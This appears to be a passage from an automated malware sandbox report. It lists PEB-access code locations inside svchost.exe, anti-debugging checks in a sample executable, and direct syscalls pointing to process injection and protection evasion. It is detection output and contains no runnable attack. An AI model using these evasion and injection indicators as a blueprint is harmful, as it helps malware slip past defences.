            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]2_2_0326A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03242840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03260854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03230887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325EF28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E6F00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0041F250 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtCreateMutant: Direct from: 0x774635CC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtWriteVirtualMemory: Direct from: 0x77462E3C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtMapViewOfSection: Direct from: 0x77462D1C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtResumeThread: Direct from: 0x774636AC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtProtectVirtualMemory: Direct from: 0x77462F9C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtSetInformationProcess: Direct from: 0x77462C5C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtSetInformationThread: Direct from: 0x774563F9
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtNotifyChangeKey: Direct from: 0x77463C2C
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtProtectVirtualMemory: Direct from: 0x77457B2E
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtAllocateVirtualMemory: Direct from: 0x77462BFC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtQueryInformationProcess: Direct from: 0x77462C26
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtResumeThread: Direct from: 0x77462FBC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtReadFile: Direct from: 0x77462ADC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtQuerySystemInformation: Direct from: 0x77462DFC
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe | NtDelayExecution: Direct from: 0x77462DDC
